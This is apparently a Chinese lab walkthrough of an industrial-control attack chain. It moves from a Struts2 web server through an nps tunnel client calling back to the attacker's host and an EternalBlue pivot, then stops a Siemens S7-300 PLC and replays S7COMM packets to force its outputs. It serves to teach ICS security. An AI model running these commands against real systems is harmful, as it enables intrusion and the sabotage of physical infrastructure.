网易首页 > 网易号 > 正文 申请入驻

工控攻防演示——从外网到内网控制系统设备的入侵

0
分享至

一、概述

1.实验目的

通过工控攻防演示让初学者学习web安全、内网渗透、工控安全相关知识技能

2.靶场信息

本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中,可以连接到真实的PLC进行漏洞利用。
网络拓扑如下:

该网络环境中,有两台攻击机处于模拟外网中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内网访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。

二、 演示过程

1.资产发现

登录 kali 攻击机,输入 ifconfig 查看 ip 段,

接着对该网段C端进行端口扫描
nmap -Pn -n —open 192.168.14.0/24

发现192.168.14.10 开放了 80 和 8080 端口,用浏览器分别访问这两个端口

发现80端口存在一个网站,8080端口为tomcat的默认界面。

2.目录扫描

使用kali 自带的 dirbrute 工具来对8080端口进行目录扫描

设置好字典,对 http://192.168.14.10:8080/ 点击start进行目录扫描

发现一个 test 目录

访问发现是struts2-showcase测试项目

3.Struts2 漏洞利用

出现struts2框架,可以尝试利用struts2命令执行漏洞。输入 msfconsole 打开 msf,如果第一次运行,可以先运行 msfdb init 来初始化 msf 数据库

输入 search struts2 来搜索 struts2 相关漏洞

加载struts2利用模块
接下来在msf 设置目标信息并攻击,其中 rhosts 为 struts2 网站的 ip,rport 为网站的端口,targeturi 为存在漏洞的地址。输入 exploit 开始攻击

可以看到成功获取该struts2 网站的权限,返回了一个 meterpreter shell,输入sysinfo可以看到这台主机的ip为 192.168.90.10, 是linux系统,版本为 Ubuntu 16.04。

4.Nps 内网代理

由于已经获取了位于内网的linux主机权限,可以通过这个meterpreter shell 来设置socks代理,这样就可以从msf中访问内网中的其它主机和端口了。
先下载nps客户端和服务端到kali攻击机中
解压安装nps
./nps install
启动nps
nps start

访问本地Ip的8080 端口,链接为http://192.168.14.4:8080 可访问nps管理后台,输入admin/123 登录。点击添加客户端

然后在msf中上传linux_amd64_client.tar.gz客户端到内网linux的主机/tmp/目录中。
upload /root/nps/linux_amd64_client.tar.gz /tmp/nps.tar.gz
在linux主机中执行解压

回到nps后台中,展开客户端,复制客户端命令

在msf meterpreter 中执行下面命令让客户端连上服务器
execute -f /tmp/npc -a ‘-server=192.168.14.4:8024 -vkey=0fr8k4rsh8tjl8ut -type=tcp’

在后台管理处看到客户端状态是在线即成功连上nps服务器。

接着在后台管理处添加一个socks代理,输入刚才创建的客户端id,端口为1086

此时可以通过本地的1086端口的socks代理访问192.168.90.0 网段的主机。在msf中输入下面命令设置socks代理。
setg proxies socks5:127.0.0.1:1086

5.永恒之蓝横向移动

设置好到进入192.168.90.0 网段的socks代理后,可以使用msf对该网段进行扫描,先扫描永恒之蓝漏洞

发现 192.168.90.60 主机存在 ms17-010漏洞,接下来使用 ms17-010 漏洞利用模块进行攻击。由于使用了socks代理,设置反向连接payload时,要设置ReverseAllowProxy

成功获取存在永恒之蓝漏洞主机的权限。

6.信息收集-发现TIA项目

通过查看用户的桌面,发现了Sand_V16目录中存在ap16后缀名的文件。

这是西门子组态软件 TIA Portal (博途)的项目文件,是用于对西门子可编程逻辑控制器(programmable logic controller,简称PLC)进行编程控制的软件。
先下载该项目到本地,使用下面命令下载
download c:/users/admin/desktop/Sand_V16.zip

7.查看TIA项目

下载完项目后,复制出到一个 windows10系统中解压。在本地电脑上装一个TIA Portal V16,然后打开该项目,点击项目视图

可以看到该项目中有两个PLC,一个是S7-300,一个是S7-1200。本演示中主要介绍S7-300

8.西门子S7-300远程启停漏洞利用

西门子S7-300是西门子的一款可编程逻辑控制器,可编程控制器由内部CPU,指令及资料存储器、输入输出单元、电源模块、数字模拟等单元所模块化组合而成。PLC可接收(输入)经过CPU处理后,发送(输出)多种类型的电气或电子信号,并使用它们来控制或监督几乎所有种类的机械与电气系统。

西门子S7-300 存在远程启停,数据重放等漏洞,可以在不进行身份认证的情况下直接对PLC进行启动、关闭和修改数据。
先获取该S7-300的IP,在项目中展开S7-300,双击设备组态,在属性中的以太网地址中查看IP地址,发现IP为192.168.30.60。

接着在获取权限的windows内网机器上ping 192.168.30.60。发现可以ping通

S7-300的端口一般是102端口,先使用msf的端口转发功能,把192.168.30.60 的102端口转发到kali攻击机上,方便访问
portfwd add -l 102 -r 192.168.30.60 -p 102

使用 nmap扫描本地102端口,发现已经转发成功了

接着在kali 攻击机上下载 isf 攻击工具,里面包含了s7-300的攻击模块,当然也可以使用其他脚本也行

运行完后,可以看到PLC进入了stop状态,也就是PLC停止了。STOP状态灯亮起

启动plc
set command 1
run

下面是PLC控制的沙盘在PLC被关闭后的效果图

直接关闭PLC,会导致正在运行的工业系统停止运行,从而导致严重的后果。可以想象一下正在运行的列车失去了控制是什么后果。

9.西门子S7-300重放攻击

西门子S7-300 没有防重放机制,只要使用wireshark等抓包工具获取了某个功能的数据包,即可重放该数据。例如Q0.6是控制沙盘中信大厦通电的输出,现在要对它单独进行修改,而不影响其它输出。可以在博途对Q0.6进行强制修改,然后抓取该数据包,进行重放即可。
在S7-300的强制表中点击监控变量,输入Q0.6,右键强制修改为0

使用wireshark抓取该数据包,发送的是S7COMM协议,该协议的详细介绍网上比较多资料,这里只对要修改的地方进行介绍,下图中 Force代表开启强制修改,Address to force 为要修改的地址,图中是Q0.6,其中Startaddress代表Q0.6的0, Bitposition 代表Q0.6的6。修改这两个数据可以修改任意输出,如Q1.1。其中的Value to force是要修改的值,在Data字段中为00,也就是要修改成0。

第一次开启强制认证时,会在PLC中创建一个对象,并且返回该对象的引用ID,下图中的Force请求响应中的Sequence number字段为4,代表创建的对象引用ID为4,后续修改强制表的时候会用到该ID。

继续强制Q0.6的值为1,可以看到发送的请求变成了Replace job,也就是修改对象,其中的 reference sequence number 为4 ,也就是修改了前面 Force 请求中创建的对象。修改的地址也是Q0.6,值为1

然后右键点击停止强制,发送了Delete job 请求,也就是删除了该强制表对象
其中的 Job reference number 为4。删除后,所有强制修改失效。

经过分析后,可以编写一个python脚本来对PLC的值进行修改。在对应的协议数据中复制tcp payload为hexstream,然后进行相应的修改并重放即可实现对指定值的修改。

下面编写一个模块脚本来对PLC的输出值进行强制修改
代码中,在Force请求发送后,会记录reference number 用于后续的修改

把脚本放在exploits/plcs/siemens/ 目录中

通过下面命令来使用

发送前S7-300的Q0.6是通电的,中信大厦正常运行

发送后S7-300的Q0.6关闭,中信大厦关闭。

直接修改PLC的关键状态,可能会导致严重的后果,如震网攻击中通过改变离心机转数来破坏伊朗的核设备。

三、 总结

本次攻防演示中,通过模拟外网攻击进入内网环境,对控制工业设备的PLC进行了攻击。整体的攻击过程为:外网web服务器-》内网西门子工程师站-》西门子S7-300 PLC。其主要目的是针对工控安全感兴趣的爱好者学习,相互交流。

大禹工控安全实验室
由中国网安·广州三零卫士成立,汇聚国内多名漏洞挖掘、二进制逆向、安全分析、渗透测试、自动化工程师等安全专家组建而成,专注于工业控制系统安全、工业物联网安全、工业威胁情报安全等安全领域,大禹工控安全实验室始终坚持在工业控制系统安全领域进行探索和研究

IRTeam工控安全红队
属于民间工业安全组织,由经验丰富的工控安全研究员组成,一直在学习和研究最新的工控漏洞及漏洞利用和防护,同时开发了Kali ICS工控渗透平台能够提供全方位的工控漏洞挖掘和渗透测试。在工控的协议安全、HMI安全、工业云安全等领域有着丰富的经验和成果

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
他都退休了,因战略眼光出众,又被军委召回担任要职,获上将军衔

他都退休了,因战略眼光出众,又被军委召回担任要职,获上将军衔

云霄纪史观
2025-12-23 01:40:09
大年初一悲剧!夫妻争吵后泼汽油纵火,致1死1重伤

大年初一悲剧!夫妻争吵后泼汽油纵火,致1死1重伤

社会日日鲜
2026-02-18 09:26:24
冬奥会女选手夺冠时激动拉开上衣,露出内衣品牌,或将因此赚得100万美元!

冬奥会女选手夺冠时激动拉开上衣,露出内衣品牌,或将因此赚得100万美元!

大象新闻
2026-02-17 17:43:34
2月17日俄乌最新: 2.5 年来的最大战果

2月17日俄乌最新: 2.5 年来的最大战果

西楼饮月
2026-02-17 20:49:47
捷安特创始人刘金标除夕辞世!享寿93岁,被称为“脚踏车传教士”

捷安特创始人刘金标除夕辞世!享寿93岁,被称为“脚踏车传教士”

火山詩话
2026-02-17 16:40:30
日本高市早苗内阁集体辞职

日本高市早苗内阁集体辞职

每日经济新闻
2026-02-18 09:28:16
刚刚,马斯克新模型撞车Claude,口碑崩了

刚刚,马斯克新模型撞车Claude,口碑崩了

AppSo
2026-02-18 07:12:23
春晚节目单公布:一共3个小品,没有相声!沈腾、马丽不演小品演“贺岁微电影”,宇树科技机器人将表演武术节目!央视记者实探春晚后台

春晚节目单公布:一共3个小品,没有相声!沈腾、马丽不演小品演“贺岁微电影”,宇树科技机器人将表演武术节目!央视记者实探春晚后台

每日经济新闻
2026-02-16 16:08:00
欧冠神剧情!卫冕冠军让二追三,20岁天才全场最佳:梅开二度

欧冠神剧情!卫冕冠军让二追三,20岁天才全场最佳:梅开二度

足球狗说
2026-02-18 06:53:57
为什么99%的动物都通不过“坐骑”面试?马:全靠同行衬托

为什么99%的动物都通不过“坐骑”面试?马:全靠同行衬托

中国科普博览
2026-02-16 17:30:03
全明星前丢掉联盟第一!雷霆连上赛季都比不过,还能否拿到60胜?

全明星前丢掉联盟第一!雷霆连上赛季都比不过,还能否拿到60胜?

无术不学
2026-02-18 10:25:04
意难平!广东网友哭诉,回老家发5000红包,孩子收到10块20块回礼

意难平!广东网友哭诉,回老家发5000红包,孩子收到10块20块回礼

火山詩话
2026-02-18 10:00:10
乌谈判代表团团长:乌美俄三方会谈首日谈判结束 明日将继续

乌谈判代表团团长:乌美俄三方会谈首日谈判结束 明日将继续

大象新闻
2026-02-18 06:43:05
以色列媒体称以方正为“美伊谈判破裂可能性”做准备

以色列媒体称以方正为“美伊谈判破裂可能性”做准备

界面新闻
2026-02-18 11:56:07
染红!63岁穆里尼奥暴怒:裁判有保护名单 上面写着几名皇马球员

染红!63岁穆里尼奥暴怒:裁判有保护名单 上面写着几名皇马球员

念洲
2026-02-18 07:03:04
王菲化妆师再次发文,回应造型翻车:不要问,问就是AI

王菲化妆师再次发文,回应造型翻车:不要问,问就是AI

韩小娱
2026-02-18 07:59:50
爆大冷!尤文耻辱一战,欧冠被灌5球,斯帕莱蒂不敢相信

爆大冷!尤文耻辱一战,欧冠被灌5球,斯帕莱蒂不敢相信

足球狗说
2026-02-18 04:33:31
90后男生春节爆赚16万元!每天只睡3小时,这种新职业爆火

90后男生春节爆赚16万元!每天只睡3小时,这种新职业爆火

大风新闻
2026-02-17 19:37:12
安徽36岁女子偶遇前夫送外卖笑得心花怒放,前夫哥:自由

安徽36岁女子偶遇前夫送外卖笑得心花怒放,前夫哥:自由

观察鉴娱
2026-02-16 11:53:13
春晚让西方破防:机器人背后,将是一场对美军的降维打击?

春晚让西方破防:机器人背后,将是一场对美军的降维打击?

华山穹剑
2026-02-17 18:21:43
2026-02-18 12:20:49
安全客 incentive-icons
安全客
有思想的安全新媒体
1360文章数 4753关注度
往期回顾 全部

科技要闻

怒烧45亿,腾讯字节阿里决战春节

头条要闻

蔡明称收到春晚邀请第一反应就是拒绝:他们给了两理由

头条要闻

蔡明称收到春晚邀请第一反应就是拒绝:他们给了两理由

体育要闻

维尼修斯进球后罢赛 向穆帅投诉对手歧视

娱乐要闻

6大卫视春晚收视出炉 北京台稳居第一

财经要闻

面条火腿香菇酱!上市公司这些年请你吃

汽车要闻

问界M6更多信息:乾崑智驾ADS4.0+鸿蒙座舱5.0

态度原创

数码
艺术
手机
房产
游戏

数码要闻

苹果发布macOS 26.4 Tahoe首个公测版:自定义充电上限

艺术要闻

这幅草书22个字,您能认全吗?艺术家精神病特质成焦点。

手机要闻

三星预热Galaxy S26系列:AI一键修复画面、切换昼夜场景

房产要闻

三亚新机场,又传出新消息!

《战神4+5》销售额破14亿美元!历久弥新大作

无障碍浏览 进入关怀版